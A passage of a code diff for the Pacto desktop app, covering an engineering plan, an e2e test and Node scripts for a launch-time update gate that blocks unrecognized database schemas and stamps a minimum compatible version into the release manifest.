+  7. Extend the existing `node --test` step in `.github/workflows/ci.yaml:249-250` to cover the new script test — vitest collects only `src/**/*.test.ts`, so a script test that is not named in CI never runs.
+- **Patterns to follow:** `scripts/generate-release-manifest.mjs` and its `node:test` sibling for the exported-pure-functions shape; `.github/workflows/release.yaml:200-204` for the `--clobber` upload and `:206` for a `needs: publish-tauri` job.
+- **Test scenarios:**
+  - Merging into a manifest preserves `version`, `notes`, `pub_date`, and every `platforms` entry byte-for-byte and adds exactly one key.
+  - Merging is idempotent: stamping an already-stamped manifest replaces the value rather than nesting or duplicating it.
+  - Covers AE6. Validation rejects a minimum greater than the manifest's `version`.
+  - Validation rejects an unparseable minimum and a missing `minimumCompatibleVersion` key.
+  - Validation accepts a minimum equal to the manifest's `version` and one below it.
+  - A leading `v` on either the tracked value or the manifest version is tolerated and the emitted field is normalized to one form.
+  - Covers AE5. An override value supplied by the dispatch path takes precedence over the tracked file and passes through the same validator.
+  - A dispatch-shaped input containing shell metacharacters is rejected by validation before reaching any command.
+  - The local harness's generated manifest carries the requested minimum and is otherwise unchanged from what it emits today.
+- **Verification:** `node --test scripts/stamp-updater-compatibility.test.mjs` passes locally and in CI; a dry run against a real published tag produces a manifest that differs from the original by exactly the new key.
+
+### U9. Operator documentation
+
+- **Goal:** Leave a release operator able to mark a release breaking, to undo it under time pressure, and to unstick a machine the local trigger blocked.
+- **Requirements:** R11.
+- **Dependencies:** U8.
+- **Files:**
+  - `docs/build/OPERATOR_UPDATES.md`
+  - `docs/README.md`
+- **Approach:**
+  1. Add a breaking-release section to `OPERATOR_UPDATES.md`: how to raise `minimumCompatibleVersion`, that it must not exceed the version being released, and what clients below it experience.
+  2. Document the correction path — the dispatchable workflow first, and the direct `gh release upload latest.json --clobber` as the emergency fallback when Actions is unavailable. The fallback must run the script's exported validator against the value first; give the exact invocation, and state that a direct edit must be mirrored back into the tracked file or the next release will regress it.
+  3. Document the manual recovery route for a machine the local trigger blocked. The app deliberately reports no npub and no path, so the procedure is: profile directories live under `<app_data_dir>/npub1…`; the block screen names the schema version it does not recognize; open each profile's `vector.db` and read `refinery_schema_history` to find the one reporting that version; move that directory aside. Every other account on the machine unblocks on the next launch.
+  4. State the three limits plainly: the manifest is unsigned, the gate cannot reach installs that predate it, and the remote trigger can be suppressed by anyone able to interfere with the manifest fetch.
+  5. Link the new section from `docs/README.md`'s build entry.
+- **Test expectation:** none — documentation-only unit.
+- **Verification:** A reader who has never run a release can raise the value, correct it, and unstick a blocked machine from the doc alone, without reading the workflow.
+
+---
+
+## System-Wide Impact
+
+**Launch gains a disk probe before account detection.** Every cold launch now opens one read-only SQLite connection per profile directory and reads that profile's whole migration history — roughly thirty rows today — before anything else touches storage. The cost is bounded by profile count, which is small today, but U3 removes the mechanism that used to bound it: an unrecognized directory is now exempt from cleanup forever, so per-launch scan cost is monotonically non-decreasing per machine. That is why U2 caps the aggregate scan rather than relying on a per-file busy timeout. The probe never migrates, but "read-only" is not "touches nothing": `vector.db` runs in WAL mode, and a read-only open of a database left with a hot WAL can recover the wal-index and write `-shm`. That is correct SQLite behavior and benign here, and it is why the probe must not set `immutable=1` — the same process may legitimately write the file moments later.
+
+**`list_accounts` changes behavior for every caller.** U3 adds a case where a directory that would previously have been deleted is now kept and returned as unknown. `has_any_account`, `check_any_account_exists`, and `auto_select_account` all sit on that scan. The invariant that must hold: a recognized profile's cleanup behavior is byte-for-byte what it is today, and only the unrecognized case diverges.
+
+**The block is machine-wide, and the exemption is permanent.** R14 states the behavior; this is its cost. One unrecognized profile directory blocks every account on that machine, and U3 is precisely what stops the directory from being cleaned up automatically. Before this plan the same directory was either silently deleted or silently skipped, never a whole-machine block. This is the deliberate consequence of R5's ordering: the onboarding-vs-unlock decision the probe precedes is itself machine-wide, so a per-profile verdict has nothing to attach to at that point in launch — Scope Boundaries records per-profile blocking as out of scope for that structural reason, not as backlog. U7's copy and U9's manual route are what keep it recoverable.
+
+**Every schema change widens the downgrade gap.** A profile touched by a build whose migration set differs from this one's cannot be opened by this one — that is already true today, because `refinery` aborts on `MissingVersion` and `DivergentVersion`, and the only thing this plan changes is that the user is told to update instead of watching the unlock fail. Nothing here makes downgrades work; it makes their failure legible.
+
+**The manifest is now load-bearing for availability, not just for updates.** Before this change, a bad `latest.json` cost a spurious update prompt. After it, a bad `minimum_compatible_version` costs access to the app. KTD2's cap is what keeps the worst case bounded to "blocked, with an installable update alongside" rather than "blocked, permanently".
+
+---
+
+## Risks and Dependencies
+
+| Risk | Mitigation |
+|---|---|
+| A mistyped or out-of-range minimum blocks users before anyone notices. | Publish-time validation in U8 catches the out-of-range case on every path including the manual fallback, and KTD2's client-side cap catches it again on a manifest the pipeline never wrote. The dispatchable correction workflow in U8 and the documented route in U9 are the recovery; AE5 is the gate on both. |
+| A network attacker or a corrupted response suppresses the remote trigger entirely — fail-open is symmetric, and defeating it needs no signature forgery. | Accepted under KD3, whose conflict call-out now records it. The local trigger is the half that survives, because it never touches the network. Nothing in this plan makes the remote trigger mandatory against an adversary who controls the fetch. |
+| A compromised release or a malicious operator turns the gate into non-dismissible pressure toward whatever installer that release publishes. | KTD2's cap does **not** address this — it bounds a wrong value, not a hostile one. The only control is the installer-signing boundary, and signing the manifest is out of scope. U7's compile-time release-page constant at least keeps the one link on the block screen out of the manifest's reach. |
+| A build ships with an incomplete embedded migration set and false-blocks every user carrying the migrations it lost. | U2's embedded-set assertion checks completeness, not just a floor: non-empty, at or above `PRE_REFINERY_CEILING`, and matching the migration files committed under `src-tauri/src/migrations/`. A floor check alone would pass a bad merge that dropped the newest files. This input has no runtime cap, so the guard has to be at build time. |
+| The comparator gets pre-release or `v`-prefix handling wrong and blocks a compatible build. | U1 is test-first with explicit coverage of both, and it is the single place any comparison happens. |
+| A future migration drops or renames `refinery_schema_history`, and `baseline_existing_account` forges history over a database it never validated. | KTD3 records the constraint as binding and U2 pins it beside the classifier and in a test. **Open decision:** this is documentation, not enforcement. The repo already statically enforces a comparable invariant with `scripts/check-orphaned-tauri-commands.mjs`, and a similar pre-merge scan over `src-tauri/src/migrations/` would close it. Adding one is not currently in scope. |
+| The remote half cannot be exercised in dev builds, so the gate could ship untested end to end. | The two-version smoke in the Verification Contract runs against real release builds, and U8 extends `scripts/local-update-test.mjs` to emit a minimum so that smoke is runnable rather than aspirational. |
+| The gate itself becomes the reason a user cannot reach their data. | The storage trigger only fires when the local history fails parity with the build, which means a different build already wrote that profile. U9 documents the manual route for the machine-wide case. A per-profile gate is out of scope for structural reasons; an in-app recovery path is deferred follow-up. |
+| The stamping job fails after the release is published, leaving a breaking release with no floor. | The job failing is visible in Actions, and the dispatchable workflow re-runs it against the same tag without a rebuild. Until it succeeds, clients fail open, which is the pre-existing behavior. |
+| A future entry point renders onboarding outside the gate wrapper and silently regresses R6. | KTD6 states the invariant, U7 asserts it in e2e, and KTD4's backend verdict keeps R12 protected even when R6 is not. There is one `<Login />` mount site today; the invariant exists so that stays true on purpose rather than by accident. |
+| The ten-second authentication await is unmeasured and could read as a hang on a slow link. | The fail-open smoke exercises it against an unreachable endpoint. The figure is an Assumption, explicitly a constant to tune against that gate rather than a product rule. |
+
+---
+
+## Verification Contract
+
+| Gate | Command or method | Applies to |
+|---|---|---|
+| Rust unit tests | `cd src-tauri && cargo test` | U2, U3, U4 |
+| Frontend unit tests | `pnpm test` | U1, U5, U6 |
+| Typecheck | `pnpm check` | U1, U4, U5, U6, U7 |
+| Lint and raw-text scan | `pnpm lint` | U7 |
+| Command wiring ratchet | `pnpm check:tauri-commands` | U4 |
+| Script tests | `node --test scripts/stamp-updater-compatibility.test.mjs` | U8 |
+| Browser e2e | `pnpm test:e2e` | U7 |
+| Host bundle | `pnpm tauri:build` | U6, U7 |
+| Embedded-set assertion | Included in `cargo test`: the embedded migration set is non-empty, its highest version is at least `PRE_REFINERY_CEILING`, and its version set matches the files under `src-tauri/src/migrations/` | U2 |
+| Storage probe against a real profile | Copy a dev account's profile directory into a sandbox, insert a `refinery_schema_history` row above the embedded ceiling, launch, and confirm the block screen appears and the directory still exists afterwards | U2, U3, R6, R12 |
+| Divergent-checksum probe | With the same sandbox, mutate the `checksum` column of a **middle** history row without changing its version; confirm the block screen appears rather than a migration error at unlock. The column is a plain `VARCHAR(255)`, so a direct SQL update suffices | U2, KTD3, R6 |
+| Multi-profile block | With one recognized and one unrecognized profile in the sandbox, confirm the recognized account is also blocked | U2, U7, R14 |
+| Cleanup regression | With the same sandbox, confirm a genuinely orphaned profile — no `pkey`, recognized schema — is still cleaned up | U3, R12 |
+| Two-version compatibility smoke | Build version N and N+1 with `scripts/local-update-test.mjs`, serve a local manifest whose `minimum_compatible_version` equals N+1 via the option U8 adds, run N, and confirm it blocks and installs; then republish with `0.0.0` and confirm N unblocks on the next launch | U5, U7, U8, R1, R2, R3 |
+| Fail-open smoke | Run a release build with the updater endpoint unreachable and a recognized profile; confirm it reaches the unlock screen without delay beyond the authentication await cap | U5, U6, R4 |
+| No-network-before-verdict | With a blocking manifest, confirm a blocked client issues no relay connection and no MLS sync on any of the three authentication paths | U6, KTD7 |
+| Onboarding-path coverage | With a blocking manifest and no existing account, confirm create-account and import-account both refuse to authenticate; then with a verdict that resolves after a create completes, confirm the running session is not interrupted | U6, R2, R9 |
+| Mid-session non-interruption | With the app unlocked, raise the minimum on the served manifest; confirm the running session is uninterrupted and the block appears only after relaunch | U5, R9 |
+| Single round trip | With the startup-check preference on, confirm one launch produces exactly one manifest fetch | U5, KTD1 |
+| Preference independence | With "check for updates on startup" off, confirm the gate still blocks | U5, R10 |
+| Gate UI walkthrough | `make dev-sandbox`, then drive the app through the Tauri MCP bridge with a forced unrecognized profile: confirm the block screen replaces both the welcome and the unlock screens, has no dismiss affordance, survives Escape and backdrop clicks, receives focus on mount, and that the account-enumeration command never fires while the gate is resolving | U7, R7, KTD6 |
+| Manifest diff | Stamp a real published tag in a dry run and diff the result against the original `latest.json` | U8, R3 |
+| Documented fallback | Follow `docs/build/OPERATOR_UPDATES.md`'s emergency procedure verbatim against a sandboxed tag with an out-of-range value; confirm the documented commands refuse to publish it | U9, U8, R11, KTD2 |
+| Workflow permissions | Confirm the new workflow declares `contents: write` and nothing broader, and that no dispatch input is interpolated into a `run:` body | U8 |
+
+**Release notes must say**, for the first release that raises the minimum, which builds are affected, that affected users must update to continue, and that installs predating the gate will not be blocked and need to be reached out of band.
+
+---
+
+## Definition of Done
+
+Global:
+
+- Every requirement R1–R14 is either satisfied or explicitly recorded as deferred with a reason.
+- Every gate in the Verification Contract has been run, and the two-version smoke's outcome is recorded.
+- A profile whose database this build does not recognize survives a launch: it is not deleted, not offered as a new account, and not opened. This holds for a version above the ceiling, a divergent checksum on any row, and a missing migration below the applied maximum.
+- The gate blocks both auth branches and all three authentication paths — a blocked client reaches neither the welcome screen nor the unlock screen, cannot create or import an account, and issues no relay or MLS traffic — and offers no way to proceed.
+- A verdict arriving after any session authenticates does not interrupt it, asserted at the store rather than at the caller.
+- An unreachable endpoint costs no launch delay beyond the authentication await cap and never blocks, and one launch makes one manifest fetch.
+- `latest.json` on a stamped release differs from the unstamped one by exactly `minimum_compatible_version`, and the value never exceeds that manifest's own `version` on any publish path — demonstrated for the scripted paths by the manifest-diff gate and for the emergency path by the documented-fallback gate.
+- A raised minimum can be corrected without cutting a new signed release, demonstrated end to end against a real tag.
+- Both locale catalogs carry the new `updater.gate.*` keys and no raw-text lint warning was introduced.
+- Every new Tauri command has a real frontend caller; `pnpm check:tauri-commands` passes without a new baseline entry. No command return value or error carries an npub or a filesystem path.
+- The new script test is named in `.github/workflows/ci.yaml` and runs there.
+- Scaffolding and abandoned-attempt code from approaches that did not work out is removed, not left in the diff.
+- Changes are left in the working tree. No commit, push, or PR without an explicit request.
+
+Per unit: the unit's own Verification line passes, and its test scenarios exist as tests except where it records `Test expectation: none` with a reason, or where U7 records them as e2e and walkthrough scenarios.

--- a/e2e/update-gate.spec.ts
+++ b/e2e/update-gate.spec.ts
@@ -48,12 +48,14 @@ async function mountGate(page: Page, scenario: StorageScenario): Promise<void> {
   await page.goto(sourceOrigin);
   await page.setContent('<main id="fixture"></main>');
   await page.evaluate(async ({ scenario }) => {
-    const [{ initI18n }, { mount, createRawSnippet }, gateModule, mockRegistryModule] = await Promise.all([
-      import('/src/lib/i18n/index.ts'),
-      import('/@id/svelte'),
-      import('/src/components/updater/UpdateGate.svelte'),
-      import('/src/lib/api/mock-registry.ts'),
-    ]);
+    const [{ initI18n }, { mount, createRawSnippet }, gateComponent, gateModule, mockRegistryModule] =
+      await Promise.all([
+        import('/src/lib/i18n/index.ts'),
+        import('/@id/svelte'),
+        import('/src/components/updater/UpdateGate.svelte'),
+        import('/src/lib/updater/update-gate.ts'),
+        import('/src/lib/api/mock-registry.ts'),
+      ]);
     await initI18n('en');
 
     mockRegistryModule.mockCommandRegistry.get_storage_compatibility = () => {
@@ -76,10 +78,14 @@ async function mountGate(page: Page, scenario: StorageScenario): Promise<void> {
       render: () => '<div data-testid="gate-children">Authenticated content</div>',
     }));
 
-    mount(gateModule.default, {
+    mount(gateComponent.default, {
       target: document.querySelector('#fixture')!,
       props: { children: childrenSnippet },
     });
+
+    // Mirrors +layout.svelte's own onMount: this is the one call site that
+    // starts gate resolution. UpdateGate itself only renders `gateState`.
+    void gateModule.resolveGateAtLaunch();
   }, { scenario });
 }
 

--- a/e2e/update-gate.spec.ts
+++ b/e2e/update-gate.spec.ts
@@ -1,0 +1,140 @@
+import { expect, test } from '@playwright/test';
+import type { Page } from '@playwright/test';
+import type { AddressInfo } from 'node:net';
+import { createServer } from 'vite';
+import type { ViteDevServer } from 'vite';
+
+let sourceServer: ViteDevServer;
+let sourceOrigin = '';
+
+test.beforeAll(async () => {
+  sourceServer = await createServer({
+    root: process.cwd(),
+    logLevel: 'silent',
+    server: { host: '127.0.0.1', port: 0, strictPort: false, hmr: false },
+  });
+  await sourceServer.listen();
+  const address = sourceServer.httpServer?.address() as AddressInfo;
+  sourceOrigin = `http://127.0.0.1:${address.port}`;
+});
+
+test.afterAll(async () => {
+  await sourceServer?.close();
+});
+
+type StorageScenario =
+  | { kind: 'recognized' }
+  | { kind: 'unrecognized'; count: number }
+  | { kind: 'pending' };
+
+/**
+ * Mounts the real `UpdateGate.svelte` directly against a controlled
+ * `get_storage_compatibility` response, using Svelte 5's public
+ * `createRawSnippet` to build the required `children` prop without a
+ * compiled wrapper component (SvelteKit's SPA fallback intercepts
+ * dynamic-import requests for arbitrary paths outside its route/module
+ * graph, so a separate fixture `.svelte` file cannot be served here). No
+ * Tauri runtime is present, so `invoke()` falls through to the app's
+ * existing browser mock registry exactly as it does in a plain browser
+ * preview.
+ *
+ * The remote minimum-version trigger is not exercised here: `isDevBuild()`
+ * short-circuits the updater plugin's `check()` in every Vite dev-server
+ * context (including this one), so that half of the gate is only
+ * verifiable against a real release build - see the plan's two-version
+ * compatibility smoke, which this suite does not attempt to replace.
+ */
+async function mountGate(page: Page, scenario: StorageScenario): Promise<void> {
+  await page.goto(sourceOrigin);
+  await page.setContent('<main id="fixture"></main>');
+  await page.evaluate(async ({ scenario }) => {
+    const [{ initI18n }, { mount, createRawSnippet }, gateModule, mockRegistryModule] = await Promise.all([
+      import('/src/lib/i18n/index.ts'),
+      import('/@id/svelte'),
+      import('/src/components/updater/UpdateGate.svelte'),
+      import('/src/lib/api/mock-registry.ts'),
+    ]);
+    await initI18n('en');
+
+    mockRegistryModule.mockCommandRegistry.get_storage_compatibility = () => {
+      if (scenario.kind === 'unrecognized') {
+        return {
+          allRecognized: false,
+          unrecognizedCount: scenario.count,
+          highestOffendingVersion: 31,
+          supportedSchemaVersion: 30,
+        };
+      }
+      if (scenario.kind === 'pending') {
+        // Deliberately never resolved, to hold the gate in 'resolving'.
+        return Promise.withResolvers().promise;
+      }
+      return { allRecognized: true, unrecognizedCount: 0, highestOffendingVersion: null, supportedSchemaVersion: 30 };
+    };
+
+    const childrenSnippet = createRawSnippet(() => ({
+      render: () => '<div data-testid="gate-children">Authenticated content</div>',
+    }));
+
+    mount(gateModule.default, {
+      target: document.querySelector('#fixture')!,
+      props: { children: childrenSnippet },
+    });
+  }, { scenario });
+}
+
+test.describe('update gate - resolving', () => {
+  test('shows the checking spinner and no children while the storage probe is pending', async ({ page }) => {
+    await mountGate(page, { kind: 'pending' });
+
+    await expect(page.locator('.checking-screen[role="status"]')).toBeVisible();
+    await expect(page.locator('[data-testid="gate-children"]')).not.toBeAttached();
+    await expect(page.getByRole('alertdialog')).not.toBeAttached();
+  });
+});
+
+test.describe('update gate - clear', () => {
+  test('renders children and no block screen when every profile is recognized', async ({ page }) => {
+    await mountGate(page, { kind: 'recognized' });
+
+    await expect(page.locator('[data-testid="gate-children"]')).toBeVisible();
+    await expect(page.getByRole('alertdialog')).not.toBeAttached();
+    await expect(page.locator('.checking-screen')).not.toBeAttached();
+  });
+});
+
+test.describe('update gate - blocked (storage-format)', () => {
+  test('replaces children with a non-dismissible block screen naming the affected profile count', async ({
+    page,
+  }) => {
+    await mountGate(page, { kind: 'unrecognized', count: 2 });
+
+    const dialog = page.getByRole('alertdialog');
+    await expect(dialog).toBeVisible();
+    await expect(page.locator('[data-testid="gate-children"]')).not.toBeAttached();
+
+    await expect(page.locator('#update-gate-title')).toHaveText('This build cannot open your data');
+    await expect(page.locator('#update-gate-description')).toContainText('2 profiles are');
+    await expect(page.locator('.gate-block-nontransient')).toContainText('not a temporary problem');
+  });
+
+  test('exposes no dismiss control and stays open on Escape', async ({ page }) => {
+    await mountGate(page, { kind: 'unrecognized', count: 1 });
+
+    const dialog = page.getByRole('alertdialog');
+    await expect(dialog).toBeVisible();
+
+    await expect(page.getByRole('button', { name: /close|dismiss/i })).toHaveCount(0);
+
+    await page.keyboard.press('Escape');
+    await expect(dialog).toBeVisible();
+  });
+
+  test('moves focus into the panel on mount', async ({ page }) => {
+    await mountGate(page, { kind: 'unrecognized', count: 1 });
+
+    const panel = page.getByRole('alertdialog');
+    await expect(panel).toBeVisible();
+    await expect(panel).toBeFocused();
+  });
+});

--- a/scripts/local-update-test.mjs
+++ b/scripts/local-update-test.mjs
@@ -4,6 +4,7 @@ import { existsSync, mkdirSync, readFileSync, writeFileSync, copyFileSync, rmSyn
 import { createServer } from 'node:http';
 import { resolve, dirname, basename } from 'node:path';
 import { fileURLToPath } from 'node:url';
+import { validateMinimumVersion, mergeMinimumVersion } from './stamp-updater-compatibility.mjs';
 
 const __dirname = dirname(fileURLToPath(import.meta.url));
 const ROOT = resolve(__dirname, '..');
@@ -70,6 +71,7 @@ function parseArgs() {
     serve: true,
     restore: false,
     debug: false,
+    minimumCompatibleVersion: null,
   };
 
   for (let i = 0; i < args.length; i++) {
@@ -86,6 +88,9 @@ function parseArgs() {
         break;
       case '--signing-key-password':
         options.signingKeyPassword = args[++i];
+        break;
+      case '--minimum-compatible-version':
+        options.minimumCompatibleVersion = args[++i];
         break;
       case '--port':
         options.port = parseInt(args[++i], 10);
@@ -129,6 +134,9 @@ Options:
   --signing-key-password <password>
                          Password for the private key (default: env TAURI_SIGNING_PRIVATE_KEY_PASSWORD)
   --port <number>         Port for the local update server (default: 8080)
+  --minimum-compatible-version <x.y.z>
+                         Stamp the generated manifest with this minimum, so the
+                         update gate blocks the old version being tested
   --install               Install the old version to /Applications/Pacto-Test.app
   --no-serve              Build artifacts but do not start the local server
   --debug                 Build debug bundles instead of release bundles (much faster)
@@ -274,11 +282,11 @@ function findSignature(artifactPath) {
   throw new Error(`Signature file not found: ${sigPath}`);
 }
 
-function generateManifest(newVersion, artifactPath, sigPath, port) {
+function generateManifest(newVersion, artifactPath, sigPath, port, minimumCompatibleVersion) {
   const filename = basename(artifactPath);
   const signature = readFileSync(sigPath, 'utf8').trim();
 
-  const manifest = {
+  let manifest = {
     version: newVersion,
     notes: 'Local update test',
     pub_date: new Date().toISOString(),
@@ -289,6 +297,10 @@ function generateManifest(newVersion, artifactPath, sigPath, port) {
       },
     },
   };
+
+  if (minimumCompatibleVersion) {
+    manifest = mergeMinimumVersion(manifest, validateMinimumVersion(minimumCompatibleVersion, manifest));
+  }
 
   const manifestPath = resolve(TEST_DIR, 'latest.json');
   writeFileSync(manifestPath, JSON.stringify(manifest, null, 2) + '\n');
@@ -418,7 +430,13 @@ async function main() {
     console.log(`Signature: ${newSigDest}`);
 
     // Generate manifest
-    const manifestPath = generateManifest(options.newVersion, newArtifactDest, newSigDest, options.port);
+    const manifestPath = generateManifest(
+      options.newVersion,
+      newArtifactDest,
+      newSigDest,
+      options.port,
+      options.minimumCompatibleVersion,
+    );
     console.log(`\nManifest: ${manifestPath}`);
 
     // Install test app if requested

--- a/scripts/release-compatibility.json
+++ b/scripts/release-compatibility.json
@@ -1,0 +1,3 @@
+{
+  "minimumCompatibleVersion": "0.0.0"
+}

--- a/scripts/stamp-updater-compatibility.mjs
+++ b/scripts/stamp-updater-compatibility.mjs
@@ -1,0 +1,247 @@
+#!/usr/bin/env node
+import { execFileSync } from 'node:child_process';
+import { existsSync, mkdtempSync, readFileSync, writeFileSync } from 'node:fs';
+import { tmpdir } from 'node:os';
+import { dirname, join, resolve } from 'node:path';
+import { fileURLToPath, pathToFileURL } from 'node:url';
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const OWNER = 'covenant-gov';
+const REPO = 'pacto-app';
+const TRACKED_CONFIG_PATH = resolve(__dirname, 'release-compatibility.json');
+
+// Strict semver core + optional leading 'v', pre-release, and build metadata.
+// Anything that isn't this shape (including shell metacharacters) fails the
+// test up front, before the value ever reaches a comparison, a file, or a
+// command.
+const VERSION_PATTERN =
+  /^v?(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$/;
+
+/**
+ * True when `value` is a syntactically valid (optionally `v`-prefixed) semver
+ * string. Pure and side-effect free — safe to call on untrusted input before
+ * any shell or network call.
+ */
+export function isSyntacticVersion(value) {
+  return typeof value === 'string' && VERSION_PATTERN.test(value.trim());
+}
+
+/**
+ * Strip an optional leading 'v' so tracked values, manifest versions, and
+ * overrides all normalize to one form before comparison or storage.
+ */
+function normalizeVersion(value) {
+  const trimmed = value.trim();
+  return trimmed.startsWith('v') || trimmed.startsWith('V') ? trimmed.slice(1) : trimmed;
+}
+
+function parseVersionParts(value) {
+  const match = VERSION_PATTERN.exec(value);
+  const [, major, minor, patch, prerelease] = match;
+  return {
+    core: [Number(major), Number(minor), Number(patch)],
+    prerelease: prerelease ? prerelease.split('.') : [],
+  };
+}
+
+function comparePrereleaseIdentifier(a, b) {
+  const aIsNumeric = /^\d+$/.test(a);
+  const bIsNumeric = /^\d+$/.test(b);
+  if (aIsNumeric && bIsNumeric) return Number(a) - Number(b);
+  if (aIsNumeric) return -1; // numeric identifiers have lower precedence
+  if (bIsNumeric) return 1;
+  return a < b ? -1 : a > b ? 1 : 0;
+}
+
+/**
+ * SemVer 2.0.0 precedence comparator. Build metadata is ignored, as the spec
+ * requires. Callers must have already confirmed both strings match
+ * `VERSION_PATTERN`.
+ */
+function compareVersions(rawA, rawB) {
+  const a = parseVersionParts(normalizeVersion(rawA));
+  const b = parseVersionParts(normalizeVersion(rawB));
+
+  for (let i = 0; i < 3; i++) {
+    if (a.core[i] !== b.core[i]) return a.core[i] - b.core[i];
+  }
+
+  if (a.prerelease.length === 0 && b.prerelease.length === 0) return 0;
+  if (a.prerelease.length === 0) return 1; // no pre-release outranks a pre-release
+  if (b.prerelease.length === 0) return -1;
+
+  const len = Math.max(a.prerelease.length, b.prerelease.length);
+  for (let i = 0; i < len; i++) {
+    if (a.prerelease[i] === undefined) return -1; // fewer fields = lower precedence
+    if (b.prerelease[i] === undefined) return 1;
+    const cmp = comparePrereleaseIdentifier(a.prerelease[i], b.prerelease[i]);
+    if (cmp !== 0) return cmp;
+  }
+  return 0;
+}
+
+/**
+ * Parse a manifest JSON string (e.g. a downloaded `latest.json`) into an
+ * object. Throws with a clear message on invalid JSON rather than letting
+ * `JSON.parse`'s error surface unannotated.
+ */
+export function parseManifest(text) {
+  try {
+    return JSON.parse(text);
+  } catch (err) {
+    throw new Error(`Could not parse manifest JSON: ${err.message}`);
+  }
+}
+
+/**
+ * Read `minimumCompatibleVersion` out of a parsed release-compatibility.json
+ * object. Throws when the key is absent or not a string.
+ */
+export function readTrackedMinimum(config) {
+  if (!config || typeof config.minimumCompatibleVersion !== 'string') {
+    throw new Error("release-compatibility.json is missing a 'minimumCompatibleVersion' string.");
+  }
+  return config.minimumCompatibleVersion;
+}
+
+/**
+ * Validate a candidate minimum-compatible-version against a manifest object.
+ * Rejects (throws) when the value isn't a valid version string, or when it
+ * is a valid version that is greater than the manifest's own `version`. The
+ * syntax check runs first and does not need the manifest, so a malformed or
+ * malicious value is rejected before anything else about it is inspected.
+ * Returns the normalized (no leading 'v') version string on success.
+ */
+export function validateMinimumVersion(minimumRaw, manifest) {
+  if (!isSyntacticVersion(minimumRaw)) {
+    throw new Error(`Minimum compatible version '${minimumRaw}' is not a valid semantic version.`);
+  }
+
+  if (!manifest || !isSyntacticVersion(manifest.version)) {
+    throw new Error('Manifest has no valid version field to validate the minimum against.');
+  }
+
+  const minimum = normalizeVersion(minimumRaw);
+  const manifestVersion = normalizeVersion(manifest.version);
+
+  if (compareVersions(minimum, manifestVersion) > 0) {
+    throw new Error(
+      `Minimum compatible version ${minimum} is greater than the release version ${manifestVersion}.`,
+    );
+  }
+
+  return minimum;
+}
+
+/**
+ * Merge a validated minimum-compatible-version into a manifest object as
+ * `minimum_compatible_version`, matching the manifest's existing snake_case
+ * `pub_date` key. Every other field is preserved untouched. Re-merging an
+ * already-stamped manifest replaces the value in place rather than adding a
+ * second key.
+ */
+export function mergeMinimumVersion(manifest, minimum) {
+  return { ...manifest, minimum_compatible_version: minimum };
+}
+
+function ghUpload(tag, filePath) {
+  execFileSync('gh', ['release', 'upload', tag, filePath, '--clobber'], {
+    stdio: 'inherit',
+    env: process.env,
+  });
+}
+
+function ghDownloadLatestJson(tag, destDir) {
+  execFileSync(
+    'gh',
+    [
+      'release',
+      'download',
+      tag,
+      '--repo',
+      `${OWNER}/${REPO}`,
+      '--pattern',
+      'latest.json',
+      '--dir',
+      destDir,
+      '--clobber',
+    ],
+    { stdio: 'inherit', env: process.env },
+  );
+}
+
+function getTag() {
+  const fromArg = process.argv[2];
+  if (fromArg) return fromArg;
+
+  const fromEnv = process.env.RELEASE_TAG;
+  if (fromEnv) return fromEnv;
+
+  const ref = process.env.GITHUB_REF;
+  if (ref && ref.startsWith('refs/tags/')) {
+    return ref.replace('refs/tags/', '');
+  }
+
+  return null;
+}
+
+/**
+ * Optional override for the minimum, e.g. from a workflow_dispatch input.
+ * Read from an explicit CLI argument or an env var so the workflow can pass
+ * it through `env:` without ever interpolating it into a shell body.
+ */
+function getOverrideValue() {
+  const fromArg = process.argv[3];
+  if (fromArg && fromArg.trim()) return fromArg.trim();
+
+  const fromEnv = process.env.OVERRIDE_MINIMUM_COMPATIBLE_VERSION;
+  if (fromEnv && fromEnv.trim()) return fromEnv.trim();
+
+  return null;
+}
+
+function readTrackedConfig() {
+  return JSON.parse(readFileSync(TRACKED_CONFIG_PATH, 'utf8'));
+}
+
+async function main() {
+  const tag = getTag();
+  if (!tag) {
+    throw new Error('No release tag provided (pass it as an argument, RELEASE_TAG, or a tag GITHUB_REF).');
+  }
+
+  // Reject a malformed or malicious override before it ever reaches a
+  // command or a network call — the tracked-file fallback below only touches
+  // the filesystem, never a shell.
+  const overrideRaw = getOverrideValue();
+  if (overrideRaw !== null && !isSyntacticVersion(overrideRaw)) {
+    throw new Error(`Override minimum compatible version '${overrideRaw}' is not a valid semantic version.`);
+  }
+  const minimumRaw = overrideRaw ?? readTrackedMinimum(readTrackedConfig());
+
+  const workDir = mkdtempSync(join(tmpdir(), 'stamp-updater-compatibility-'));
+  ghDownloadLatestJson(tag, workDir);
+
+  const manifestPath = join(workDir, 'latest.json');
+  if (!existsSync(manifestPath)) {
+    throw new Error(`Expected ${manifestPath} to exist after downloading the release assets.`);
+  }
+
+  const manifest = parseManifest(readFileSync(manifestPath, 'utf8'));
+  const minimum = validateMinimumVersion(minimumRaw, manifest);
+  const merged = mergeMinimumVersion(manifest, minimum);
+
+  writeFileSync(manifestPath, JSON.stringify(merged, null, 2) + '\n');
+  ghUpload(tag, manifestPath);
+
+  console.log(`Stamped ${tag}'s latest.json with minimum_compatible_version ${minimum}.`);
+}
+
+if (pathToFileURL(process.argv[1]).href === import.meta.url) {
+  main().catch((err) => {
+    console.error(err.message);
+    process.exit(1);
+  });
+}
+
+export { main };

--- a/scripts/stamp-updater-compatibility.mjs
+++ b/scripts/stamp-updater-compatibility.mjs
@@ -89,7 +89,7 @@ export function parseManifest(text) {
   try {
     return JSON.parse(text);
   } catch (err) {
-    throw new Error(`Could not parse manifest JSON: ${err.message}`);
+    throw new Error(`Could not parse manifest JSON: ${err.message}`, { cause: err });
   }
 }
 

--- a/scripts/stamp-updater-compatibility.test.mjs
+++ b/scripts/stamp-updater-compatibility.test.mjs
@@ -1,0 +1,136 @@
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import {
+  isSyntacticVersion,
+  parseManifest,
+  readTrackedMinimum,
+  validateMinimumVersion,
+  mergeMinimumVersion,
+} from './stamp-updater-compatibility.mjs';
+
+const baseManifest = {
+  version: '1.2.0',
+  notes: 'Some release notes',
+  pub_date: '2026-07-11T00:00:00Z',
+  platforms: {
